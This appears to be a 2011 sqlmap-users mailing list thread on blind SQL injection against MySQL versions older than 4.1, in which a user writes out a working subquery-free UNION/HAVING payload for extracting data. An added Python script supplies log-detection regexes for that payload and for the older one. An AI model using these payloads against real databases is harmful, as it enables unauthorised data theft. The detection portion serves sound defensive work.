I've found a way around it
this query is invalid:
1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM
randomtable),1,1)) > 51
this is valid:
1234 AND 1 = 0 UNION SELECT ORD(MID(IFNULL(CAST(COUNT(*) AS
CHAR),CHAR(32)),1,1)) AS ENTR,id FROM
randomtable
GROUP BY id HAVING ENTR > 51
In the same way it would be possible to dump table content.
Necessary for this kind of payload is:
- an injection point which just checks if the query returns a result at all.
- knowledge of the number of selected columns
- knowledge of one column name
Cheers
- Till
> Date: Tue, 12 Jul 2011 23:45:41 +0200
> Subject: Re: [sqlmap-users] Subquery payloads on mysql <4.1
> From: miroslav.stam...@gmail.com
> To: till...@hotmail.com
> CC: sqlmap-users@lists.sourceforge.net
>
> found one (VM) and done some tests :)
>
> you are right, subqueries can't be used on MySQL < 4.1 which means
> that sql injection there is of no significant value (e.g. dumping of
> table content which inherently requires subquerying mechanism).
>
> kr
>
> On Tue, Jul 12, 2011 at 11:23 PM, Miroslav Stampar
> <miroslav.stam...@gmail.com> wrote:
> > ok, got the point.
> >
> > also seen the same thing on Twitter a few days ago, maybe it was you :)
> >
> > two things:
> > A) does anyone have experience with subqueries on MySQL < 4.1?
> > B) is there some VM around that carries for example MySQL 3.x ready for
> > testing?
> >
> > kr
> >
> > On Tue, Jul 12, 2011 at 1:01 PM, Till .ch <till...@hotmail.com> wrote:
> >> Hi
> >>
> >>
> >> Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap
> >> detected
> >> the injection point just fine, but struggled with gathering information
> >> about other tables.
> >> I guess this happened due to the fact that subqueries were introduced
> >> with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html)
> >> and thus payloads like the following are regarded as an invalid query on
> >> mysql <4.1:
> >>
> >>
> >> [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32))
> >> FROM randomtable),1,1)) > 51
> >>
> >>
> >> Best Regards
> >> Till
> >>
> >
> >
> >
> > --
> > Miroslav Stampar (@stamparm)
> >
> > E-mail: miroslav.stampar (at) gmail.com
> > PGP Key ID: 0xB5397B1B
> >
>
>
>
> --
> Miroslav Stampar (@stamparm)
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
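Added example, not part of the thread and not sqlmap's own code: the point above is that on MySQL < 4.1 a boolean-based probe no longer needs a `(SELECT ...)` subquery, so a log rule that only looks for subqueries inside a WHERE clause misses the UNION / GROUP BY / HAVING variant. The script below runs a few signatures over constructed SQL log lines (the log format `timestamp app=... query=...`, the table `items`, and the signature names are all assumptions) and shows that the two payloads quoted in the thread trip different signatures, while a benign GROUP BY query is left alone.

```python
import re

# Constructed sample SQL log lines (not from the thread): a benign lookup, the
# two payloads quoted in the thread appended to that same benign statement, and
# a benign GROUP BY query that must not be flagged.
SAMPLE_LOG = [
    "2011-07-13 10:00:01 app=shop query=SELECT name FROM items WHERE id = 1234",
    "2011-07-13 10:00:02 app=shop query=SELECT name FROM items WHERE id = 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM randomtable),1,1)) > 51",
    "2011-07-13 10:00:03 app=shop query=SELECT name FROM items WHERE id = 1234 AND 1 = 0 UNION SELECT ORD(MID(IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)),1,1)) AS ENTR,id FROM randomtable GROUP BY id HAVING ENTR > 51",
    "2011-07-13 10:00:04 app=shop query=SELECT id FROM orders WHERE total > 51 GROUP BY id",
]

# (name, regex) pairs; names are assumed labels, not an established taxonomy.
# "subquery_in_condition" alone catches only the >= 4.1 style payload;
# "union_having_probe" and "always_false_union" cover the subquery-free variant.
SIGNATURES = [
    ("blind_char_probe", re.compile(r"\bORD\s*\(\s*MID\s*\(", re.I)),
    ("subquery_in_condition", re.compile(r"\(\s*SELECT\b", re.I)),
    ("union_having_probe",
     re.compile(r"\bUNION\s+SELECT\b.*\bGROUP\s+BY\b.*\bHAVING\b", re.I | re.S)),
    ("always_false_union", re.compile(r"\b1\s*=\s*0\s+UNION\b", re.I)),
]


def parse_line(line):
    """Split a log line into (timestamp, sql); None for lines without a query field."""
    if " query=" not in line:
        return None
    head, sql = line.split(" query=", 1)
    return head[:19], sql.strip()


def classify(sql):
    """Return the names of every signature matching the statement, in SIGNATURES order."""
    return [name for name, rx in SIGNATURES if rx.search(sql)]


def scan(lines):
    """Return (timestamp, matched signature names) for each line with at least one hit."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, sql = parsed
        hits = classify(sql)
        if hits:
            findings.append((ts, hits))
    return findings


if __name__ == "__main__":
    for ts, hits in scan(SAMPLE_LOG):
        print(ts, ", ".join(hits))
```

Run against the constructed log, the subquery payload matches `blind_char_probe` and `subquery_in_condition`, the UNION/HAVING payload matches `blind_char_probe`, `union_having_probe` and `always_false_union`, and the benign GROUP BY query matches nothing. The regexes are deliberately loose (case-insensitive, whitespace-tolerant); in a real deployment the durable fix is still parameterised queries in the application rather than pattern matching on the log.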